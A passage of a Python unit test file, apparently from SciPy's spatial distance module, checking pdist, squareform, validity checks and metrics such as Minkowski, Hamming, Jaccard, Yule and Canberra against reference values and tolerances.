Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_3_2_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-minkowski-3.2-iris']
Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_3_2_iris_nonC(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-3.2-iris']
Y_test2 = pdist(X, 'test_minkowski', 3.2)
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_minkowski_5_8_iris(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-5.8-iris']
Y_test1 = pdist(X, 'minkowski', 5.8)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_5_8_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-minkowski-5.8-iris']
Y_test1 = pdist(X, 'minkowski', 5.8)
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_minkowski_5_8_iris_nonC(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-5.8-iris']
Y_test2 = pdist(X, 'test_minkowski', 5.8)
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_wminkowski(self):
x = np.array([[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[1.0, 1.0, 1.0]])
p2_expected = [1.0, 1.0, np.sqrt(3),
np.sqrt(2), np.sqrt(2),
np.sqrt(2)]
p1_expected = [0.5, 1.0, 3.5,
1.5, 3.0,
2.5]
dist = pdist(x, metric=wminkowski, w=[1.0, 1.0, 1.0])
assert_allclose(dist, p2_expected, rtol=1e-14)
dist = pdist(x, metric=wminkowski, w=[0.5, 1.0, 2.0], p=1)
assert_allclose(dist, p1_expected, rtol=1e-14)
dist = pdist(x, metric='wminkowski', w=[1.0, 1.0, 1.0])
assert_allclose(dist, p2_expected, rtol=1e-14)
dist = pdist(x, metric='wminkowski', w=[0.5, 1.0, 2.0], p=1)
assert_allclose(dist, p1_expected, rtol=1e-14)
def test_pdist_wminkowski_int_weights(self):
# regression test for int weights
x = np.array([[0.0, 0.0, 0.0],
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[1.0, 1.0, 1.0]])
dist1 = pdist(x, metric='wminkowski', w=np.arange(3), p=1)
dist2 = pdist(x, metric='wminkowski', w=[0., 1., 2.], p=1)
assert_allclose(dist1, dist2, rtol=1e-14)
def test_pdist_hamming_random(self):
eps = 1e-07
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_hamming_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_hamming_random_nonC(self):
eps = 1e-07
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-hamming']
Y_test2 = pdist(X, 'test_hamming')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_dhamming_random(self):
eps = 1e-07
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_dhamming_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test1 = pdist(X, 'hamming')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_dhamming_random_nonC(self):
eps = 1e-07
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-hamming']
Y_test2 = pdist(X, 'test_hamming')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_jaccard_random(self):
eps = 1e-08
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_jaccard_random_float32(self):
eps = 1e-08
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_jaccard_random_nonC(self):
eps = 1e-08
X = eo['pdist-boolean-inp']
Y_right = eo['pdist-jaccard']
Y_test2 = pdist(X, 'test_jaccard')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_djaccard_random(self):
eps = 1e-08
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_djaccard_random_float32(self):
eps = 1e-08
X = np.float32(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test1 = pdist(X, 'jaccard')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_djaccard_random_nonC(self):
eps = 1e-08
X = np.float64(eo['pdist-boolean-inp'])
Y_right = eo['pdist-jaccard']
Y_test2 = pdist(X, 'test_jaccard')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_chebychev_random(self):
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-chebychev']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_chebychev_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-chebychev']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_chebychev_random_nonC(self):
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-chebychev']
Y_test2 = pdist(X, 'test_chebychev')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_chebychev_iris(self):
eps = 1e-15
X = eo['iris']
Y_right = eo['pdist-chebychev-iris']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_chebychev_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-chebychev-iris']
Y_test1 = pdist(X, 'chebychev')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_chebychev_iris_nonC(self):
eps = 1e-15
X = eo['iris']
Y_right = eo['pdist-chebychev-iris']
Y_test2 = pdist(X, 'test_chebychev')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_matching_mtica1(self):
# Test matching(*,*) with mtica example #1 (nums).
m = matching(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = matching(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
assert_allclose(m, 0.6, rtol=0, atol=1e-10)
assert_allclose(m2, 0.6, rtol=0, atol=1e-10)
def test_pdist_matching_mtica2(self):
# Test matching(*,*) with mtica example #2.
m = matching(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = matching(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
assert_allclose(m, 2/3, rtol=0, atol=1e-10)
assert_allclose(m2, 2/3, rtol=0, atol=1e-10)
def test_pdist_matching_match(self):
# Test pdist(X, 'matching') to see if the two implementations match on
# random boolean input data.
D = eo['random-bool-data']
B = np.bool_(D)
if verbose > 2:
print(B.shape, B.dtype)
eps = 1e-10
y1 = pdist(B, "matching")
y2 = pdist(B, "test_matching")
y3 = pdist(D, "test_matching")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y1-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_jaccard_mtica1(self):
m = jaccard(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = jaccard(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
assert_allclose(m, 0.6, rtol=0, atol=1e-10)
assert_allclose(m2, 0.6, rtol=0, atol=1e-10)
def test_pdist_jaccard_mtica2(self):
m = jaccard(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = jaccard(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
assert_allclose(m, 2/3, rtol=0, atol=1e-10)
assert_allclose(m2, 2/3, rtol=0, atol=1e-10)
def test_pdist_jaccard_match(self):
# Test pdist(X, 'jaccard') to see if the two implementations match on
# random double input data.
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "jaccard")
y2 = pdist(D, "test_jaccard")
y3 = pdist(np.bool_(D), "test_jaccard")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_yule_mtica1(self):
m = yule(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = yule(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 2, rtol=0, atol=1e-10)
assert_allclose(m2, 2, rtol=0, atol=1e-10)
def test_pdist_yule_mtica2(self):
m = yule(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = yule(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 2, rtol=0, atol=1e-10)
assert_allclose(m2, 2, rtol=0, atol=1e-10)
def test_pdist_yule_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "yule")
y2 = pdist(D, "test_yule")
y3 = pdist(np.bool_(D), "test_yule")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_dice_mtica1(self):
m = dice(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = dice(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/7, rtol=0, atol=1e-10)
assert_allclose(m2, 3/7, rtol=0, atol=1e-10)
def test_pdist_dice_mtica2(self):
m = dice(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = dice(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 0.5, rtol=0, atol=1e-10)
assert_allclose(m2, 0.5, rtol=0, atol=1e-10)
def test_pdist_dice_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "dice")
y2 = pdist(D, "test_dice")
y3 = pdist(D, "test_dice")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_sokalsneath_mtica1(self):
m = sokalsneath(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = sokalsneath(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/4, rtol=0, atol=1e-10)
assert_allclose(m2, 3/4, rtol=0, atol=1e-10)
def test_pdist_sokalsneath_mtica2(self):
m = sokalsneath(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = sokalsneath(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 4/5, rtol=0, atol=1e-10)
assert_allclose(m2, 4/5, rtol=0, atol=1e-10)
def test_pdist_sokalsneath_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "sokalsneath")
y2 = pdist(D, "test_sokalsneath")
y3 = pdist(np.bool_(D), "test_sokalsneath")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_rogerstanimoto_mtica1(self):
m = rogerstanimoto(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = rogerstanimoto(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/4, rtol=0, atol=1e-10)
assert_allclose(m2, 3/4, rtol=0, atol=1e-10)
def test_pdist_rogerstanimoto_mtica2(self):
m = rogerstanimoto(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = rogerstanimoto(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 4/5, rtol=0, atol=1e-10)
assert_allclose(m2, 4/5, rtol=0, atol=1e-10)
def test_pdist_rogerstanimoto_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "rogerstanimoto")
y2 = pdist(D, "test_rogerstanimoto")
y3 = pdist(np.bool_(D), "test_rogerstanimoto")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_russellrao_mtica1(self):
m = russellrao(np.array([1, 0, 1, 1, 0]),
np.array([1, 1, 0, 1, 1]))
m2 = russellrao(np.array([1, 0, 1, 1, 0], dtype=np.bool),
np.array([1, 1, 0, 1, 1], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 3/5, rtol=0, atol=1e-10)
assert_allclose(m2, 3/5, rtol=0, atol=1e-10)
def test_pdist_russellrao_mtica2(self):
m = russellrao(np.array([1, 0, 1]),
np.array([1, 1, 0]))
m2 = russellrao(np.array([1, 0, 1], dtype=np.bool),
np.array([1, 1, 0], dtype=np.bool))
if verbose > 2:
print(m)
assert_allclose(m, 2/3, rtol=0, atol=1e-10)
assert_allclose(m2, 2/3, rtol=0, atol=1e-10)
def test_pdist_russellrao_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "russellrao")
y2 = pdist(D, "test_russellrao")
y3 = pdist(np.bool_(D), "test_russellrao")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_sokalmichener_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "sokalmichener")
y2 = pdist(D, "test_sokalmichener")
y3 = pdist(np.bool_(D), "test_sokalmichener")
if verbose > 2:
print(np.abs(y1-y2).max())
print(np.abs(y2-y3).max())
_assert_within_tol(y1, y2, eps)
_assert_within_tol(y2, y3, eps)
def test_pdist_kulsinski_match(self):
D = eo['random-bool-data']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "kulsinski")
y2 = pdist(D, "test_kulsinski")
y3 = pdist(np.bool_(D), "test_kulsinski")
_assert_within_tol(y1, y2, eps, verbose > 2)
_assert_within_tol(y2, y3, eps)
def test_pdist_canberra_match(self):
D = eo['iris']
if verbose > 2:
print(D.shape, D.dtype)
eps = 1e-10
y1 = pdist(D, "canberra")
y2 = pdist(D, "test_canberra")
_assert_within_tol(y1, y2, eps, verbose > 2)
def test_pdist_canberra_ticket_711(self):
# Test pdist(X, 'canberra') to see if Canberra gives the right result
# as reported on gh-1238.
eps = 1e-8
pdist_y = pdist(([3.3], [3.4]), "canberra")
right_y = 0.01492537
_assert_within_tol(pdist_y, right_y, eps, verbose > 2)
def within_tol(a, b, tol):
return np.abs(a - b).max() < tol
def _assert_within_tol(a, b, atol, verbose_=False):
if verbose_:
print(np.abs(a-b).max())
assert_allclose(a, b, rtol=0, atol=atol)
class TestSomeDistanceFunctions(TestCase):
def setUp(self):
# 1D arrays
x = np.array([1.0, 2.0, 3.0])
y = np.array([1.0, 1.0, 5.0])
# 3x1 arrays
x31 = x[:,np.newaxis]
y31 = y[:,np.newaxis]
# 1x3 arrays
x13 = x31.T
y13 = y31.T
self.cases = [(x,y), (x31, y31), (x13, y13)]
def test_minkowski(self):
for x, y in self.cases:
dist1 = minkowski(x, y, p=1)
assert_almost_equal(dist1, 3.0)
dist1p5 = minkowski(x, y, p=1.5)
assert_almost_equal(dist1p5, (1.0+2.0**1.5)**(2./3))
dist2 = minkowski(x, y, p=2)
assert_almost_equal(dist2, np.sqrt(5))
def test_wminkowski(self):
w = np.array([1.0, 2.0, 0.5])
for x, y in self.cases:
dist1 = wminkowski(x, y, p=1, w=w)
assert_almost_equal(dist1, 3.0)
dist1p5 = wminkowski(x, y, p=1.5, w=w)
assert_almost_equal(dist1p5, (2.0**1.5+1.0)**(2./3))
dist2 = wminkowski(x, y, p=2, w=w)
assert_almost_equal(dist2, np.sqrt(5))
def test_euclidean(self):
for x, y in self.cases:
dist = euclidean(x, y)
assert_almost_equal(dist, np.sqrt(5))
def test_sqeuclidean(self):
for x, y in self.cases:
dist = sqeuclidean(x, y)
assert_almost_equal(dist, 5.0)
def test_cosine(self):
for x, y in self.cases:
dist = cosine(x, y)
assert_almost_equal(dist, 1.0 - 18.0/(np.sqrt(14)*np.sqrt(27)))
def test_correlation(self):
xm = np.array([-1.0, 0, 1.0])
ym = np.array([-4.0/3, -4.0/3, 5.0-7.0/3])
for x, y in self.cases:
dist = correlation(x, y)
assert_almost_equal(dist, 1.0 - np.dot(xm, ym)/(norm(xm)*norm(ym)))
def test_mahalanobis(self):
x = np.array([1.0, 2.0, 3.0])
y = np.array([1.0, 1.0, 5.0])
vi = np.array([[2.0, 1.0, 0.0],[1.0, 2.0, 1.0], [0.0, 1.0, 2.0]])
for x, y in self.cases:
dist = mahalanobis(x, y, vi)
assert_almost_equal(dist, np.sqrt(6.0))
class TestSquareForm(TestCase):
def test_squareform_empty_matrix(self):
A = np.zeros((0,0))
rA = squareform(np.array(A, dtype='double'))
assert_equal(rA.shape, (0,))
def test_squareform_empty_vector(self):
v = np.zeros((0,))
rv = squareform(np.array(v, dtype='double'))
assert_equal(rv.shape, (1,1))
assert_equal(rv[0, 0], 0)
def test_squareform_1by1_matrix(self):
A = np.zeros((1,1))
rA = squareform(np.array(A, dtype='double'))
assert_equal(rA.shape, (0,))
def test_squareform_one_vector(self):
v = np.ones((1,)) * 8.3
rv = squareform(np.array(v, dtype='double'))
assert_equal(rv.shape, (2,2))
assert_equal(rv[0,1], 8.3)
assert_equal(rv[1,0], 8.3)
def test_squareform_one_binary_vector(self):
# Tests squareform on a 1x1 binary matrix; conversion to double was
# causing problems (see pull request 73).
v = np.ones((1,), dtype=np.bool)
rv = squareform(v)
assert_equal(rv.shape, (2,2))
assert_(rv[0,1])
def test_squareform_2by2_matrix(self):
A = np.zeros((2,2))
A[0,1] = 0.8
A[1,0] = 0.8
rA = squareform(np.array(A, dtype='double'))
assert_equal(rA.shape, (1,))
assert_equal(rA[0], 0.8)
def test_squareform_multi_matrix(self):
for n in xrange(2, 5):
yield self.check_squareform_multi_matrix(n)
def check_squareform_multi_matrix(self, n):
X = np.random.rand(n, 4)
Y = pdist(X)
assert_equal(len(Y.shape), 1)
A = squareform(Y)
Yr = squareform(A)
s = A.shape
k = 0
if verbose >= 3:
print(A.shape, Y.shape, Yr.shape)
assert_equal(len(s), 2)
assert_equal(len(Yr.shape), 1)
assert_equal(s[0], s[1])
for i in xrange(0, s[0]):
for j in xrange(i+1, s[1]):
if i != j:
assert_equal(A[i, j], Y[k])
k += 1
else:
assert_equal(A[i, j], 0)
class TestNumObsY(TestCase):
def test_num_obs_y_multi_matrix(self):
for n in xrange(2, 10):
X = np.random.rand(n, 4)
Y = pdist(X)
assert_equal(num_obs_y(Y), n)
def test_num_obs_y_1(self):
# Tests num_obs_y(y) on a condensed distance matrix over 1
# observations. Expecting exception.
assert_raises(ValueError, self.check_y, 1)
def test_num_obs_y_2(self):
# Tests num_obs_y(y) on a condensed distance matrix over 2
# observations.
assert_(self.check_y(2))
def test_num_obs_y_3(self):
assert_(self.check_y(3))
def test_num_obs_y_4(self):
assert_(self.check_y(4))
def test_num_obs_y_5_10(self):
for i in xrange(5, 16):
self.minit(i)
def test_num_obs_y_2_100(self):
# Tests num_obs_y(y) on 100 improper condensed distance matrices.
# Expecting exception.
a = set([])
for n in xrange(2, 16):
a.add(n*(n-1)/2)
for i in xrange(5, 105):
if i not in a:
assert_raises(ValueError, self.bad_y, i)
def minit(self, n):
assert_(self.check_y(n))
def bad_y(self, n):
y = np.random.rand(n)
return num_obs_y(y)
def check_y(self, n):
return num_obs_y(self.make_y(n)) == n
def make_y(self, n):
return np.random.rand((n * (n - 1)) // 2)
class TestNumObsDM(TestCase):
def test_num_obs_dm_multi_matrix(self):
for n in xrange(1, 10):
X = np.random.rand(n, 4)
Y = pdist(X)
A = squareform(Y)
if verbose >= 3:
print(A.shape, Y.shape)
assert_equal(num_obs_dm(A), n)
def test_num_obs_dm_0(self):
# Tests num_obs_dm(D) on a 0x0 distance matrix. Expecting exception.
assert_(self.check_D(0))
def test_num_obs_dm_1(self):
# Tests num_obs_dm(D) on a 1x1 distance matrix.
assert_(self.check_D(1))
def test_num_obs_dm_2(self):
assert_(self.check_D(2))
def test_num_obs_dm_3(self):
assert_(self.check_D(2))
def test_num_obs_dm_4(self):
assert_(self.check_D(4))
def check_D(self, n):
return num_obs_dm(self.make_D(n)) == n
def make_D(self, n):
return np.random.rand(n, n)
def is_valid_dm_throw(D):
return is_valid_dm(D, throw=True)
class TestIsValidDM(TestCase):
def test_is_valid_dm_int16_array_E(self):
# Tests is_valid_dm(*) on an int16 array. Exception expected.
D = np.zeros((5, 5), dtype='i')
assert_raises(TypeError, is_valid_dm_throw, (D))
def test_is_valid_dm_int16_array_F(self):
D = np.zeros((5, 5), dtype='i')
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_improper_shape_1D_E(self):
D = np.zeros((5,), dtype=np.double)
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_improper_shape_1D_F(self):
D = np.zeros((5,), dtype=np.double)
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_improper_shape_3D_E(self):
D = np.zeros((3,3,3), dtype=np.double)
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_improper_shape_3D_F(self):
D = np.zeros((3,3,3), dtype=np.double)
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_nonzero_diagonal_E(self):
y = np.random.rand(10)
D = squareform(y)
for i in xrange(0, 5):
D[i, i] = 2.0
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_nonzero_diagonal_F(self):
y = np.random.rand(10)
D = squareform(y)
for i in xrange(0, 5):
D[i, i] = 2.0
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_asymmetric_E(self):
y = np.random.rand(10)
D = squareform(y)
D[1,3] = D[3,1] + 1
assert_raises(ValueError, is_valid_dm_throw, (D))
def test_is_valid_dm_asymmetric_F(self):
y = np.random.rand(10)
D = squareform(y)
D[1,3] = D[3,1] + 1
assert_equal(is_valid_dm(D), False)
def test_is_valid_dm_correct_1_by_1(self):
D = np.zeros((1,1), dtype=np.double)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_2_by_2(self):
y = np.random.rand(1)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_3_by_3(self):
y = np.random.rand(3)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_4_by_4(self):
y = np.random.rand(6)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def test_is_valid_dm_correct_5_by_5(self):
y = np.random.rand(10)
D = squareform(y)
assert_equal(is_valid_dm(D), True)
def is_valid_y_throw(y):
return is_valid_y(y, throw=True)
class TestIsValidY(TestCase):
# If test case name ends on "_E" then an exception is expected for the
# given input, if it ends in "_F" then False is expected for the is_valid_y
# check. Otherwise the input is expected to be valid.
def test_is_valid_y_int16_array_E(self):
y = np.zeros((10,), dtype='i')
assert_raises(TypeError, is_valid_y_throw, (y))
def test_is_valid_y_int16_array_F(self):
y = np.zeros((10,), dtype='i')
assert_equal(is_valid_y(y), False)
def test_is_valid_y_improper_shape_2D_E(self):
y = np.zeros((3,3,), dtype=np.double)
assert_raises(ValueError, is_valid_y_throw, (y))
def test_is_valid_y_improper_shape_2D_F(self):
y = np.zeros((3,3,), dtype=np.double)
assert_equal(is_valid_y(y), False)
def test_is_valid_y_improper_shape_3D_E(self):
y = np.zeros((3,3,3), dtype=np.double)
assert_raises(ValueError, is_valid_y_throw, (y))
def test_is_valid_y_improper_shape_3D_F(self):
y = np.zeros((3,3,3), dtype=np.double)
assert_equal(is_valid_y(y), False)
def test_is_valid_y_correct_2_by_2(self):
y = self.correct_n_by_n(2)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_correct_3_by_3(self):
y = self.correct_n_by_n(3)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_correct_4_by_4(self):
y = self.correct_n_by_n(4)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_correct_5_by_5(self):
y = self.correct_n_by_n(5)
assert_equal(is_valid_y(y), True)
def test_is_valid_y_2_100(self):
a = set([])
for n in xrange(2, 16):
a.add(n*(n-1)/2)
for i in xrange(5, 105):
if i not in a:
assert_raises(ValueError, self.bad_y, i)
def bad_y(self, n):
y = np.random.rand(n)
return is_valid_y(y, throw=True)
def correct_n_by_n(self, n):
y = np.random.rand((n * (n - 1)) // 2)
return y
def test_bad_p():
# Raise ValueError if p < 1.
p = 0.5
assert_raises(ValueError, minkowski, [1, 2], [3, 4], p)
assert_raises(ValueError, wminkowski, [1, 2], [3, 4], p, [1, 1])
def test_sokalsneath_all_false():
# Regression test for ticket #876
assert_raises(ValueError, sokalsneath, [False, False, False], [False, False, False])
def test_canberra():
# Regression test for ticket #1430.
assert_equal(canberra([1,2,3], [2,4,6]), 1)
assert_equal(canberra([1,1,0,0], [1,0,1,0]), 2)
def test_braycurtis():
# Regression test for ticket #1430.
assert_almost_equal(braycurtis([1,2,3], [2,4,6]), 1./3, decimal=15)
assert_almost_equal(braycurtis([1,1,0,0], [1,0,1,0]), 0.5, decimal=15)
def test_euclideans():
# Regression test for ticket #1328.
x1 = np.array([1, 1, 1])
x2 = np.array([0, 0, 0])
# Basic test of the calculation.
assert_almost_equal(sqeuclidean(x1, x2), 3.0, decimal=14)
assert_almost_equal(euclidean(x1, x2), np.sqrt(3), decimal=14)
# Check flattening for (1, N) or (N, 1) inputs
assert_almost_equal(euclidean(x1[np.newaxis, :], x2[np.newaxis, :]),
np.sqrt(3), decimal=14)
assert_almost_equal(sqeuclidean(x1[np.newaxis, :], x2[np.newaxis, :]),
3.0, decimal=14)
assert_almost_equal(sqeuclidean(x1[:, np.newaxis], x2[:, np.newaxis]),
3.0, decimal=14)
# Distance metrics only defined for vectors (= 1-D)
x = np.arange(4).reshape(2, 2)
assert_raises(ValueError, euclidean, x, x)
assert_raises(ValueError, sqeuclidean, x, x)
# Another check, with random data.
rs = np.random.RandomState(1234567890)
x = rs.rand(10)
y = rs.rand(10)
d1 = euclidean(x, y)
d2 = sqeuclidean(x, y)
assert_almost_equal(d1**2, d2, decimal=14)
def test_hamming_unequal_length():
# Regression test for gh-4290.
x = [0, 0, 1]
y = [1, 0, 1, 0]
# Used to give an AttributeError from ndarray.mean called on bool
assert_raises(ValueError, hamming, x, y)
def test_hamming_string_array():
# https://github.com/scikit-learn/scikit-learn/issues/4014
a = np.array(['eggs', 'spam', 'spam', 'eggs', 'spam', 'spam', 'spam',
'spam', 'spam', 'spam', 'spam', 'eggs', 'eggs', 'spam',
'eggs', 'eggs', 'eggs', 'eggs', 'eggs', 'spam'],
dtype='|S4')
b = np.array(['eggs', 'spam', 'spam', 'eggs', 'eggs', 'spam', 'spam',
'spam', 'spam', 'eggs', 'spam', 'eggs', 'spam', 'eggs',
'spam', 'spam', 'eggs', 'spam', 'spam', 'eggs'],
dtype='|S4')
desired = 0.45
assert_allclose(hamming(a, b), desired)
def test_sqeuclidean_dtypes():
# Assert that sqeuclidean returns the right types of values.
# Integer types should be converted to floating for stability.
# Floating point types should be the same as the input.
x = [1, 2, 3]
y = [4, 5, 6]
for dtype in [np.int8, np.int16, np.int32, np.int64]:
d = sqeuclidean(np.asarray(x, dtype=dtype), np.asarray(y, dtype=dtype))
assert_(np.issubdtype(d.dtype, np.floating))
for dtype in [np.uint8, np.uint16, np.uint32, np.uint64]:
d1 = sqeuclidean([0], np.asarray([-1], dtype=dtype))
d2 = sqeuclidean(np.asarray([-1], dtype=dtype), [0])
assert_equal(d1, d2)
assert_equal(d1, np.float64(np.iinfo(dtype).max) ** 2)
dtypes = [np.float32, np.float64, np.complex64, np.complex128]
for dtype in ['float16', 'float128']:
# These aren't present in older numpy versions; float128 may also not
# be present on all platforms.
if hasattr(np, dtype):
dtypes.append(getattr(np, dtype))
for dtype in dtypes:
d = sqeuclidean(np.asarray(x, dtype=dtype), np.asarray(y, dtype=dtype))
assert_equal(d.dtype, dtype)
def test_sokalmichener():
# Test that sokalmichener has the same result for bool and int inputs.
p = [True, True, False]
q = [True, False, True]
x = [int(b) for b in p]
y = [int(b) for b in q]
dist1 = sokalmichener(p, q)
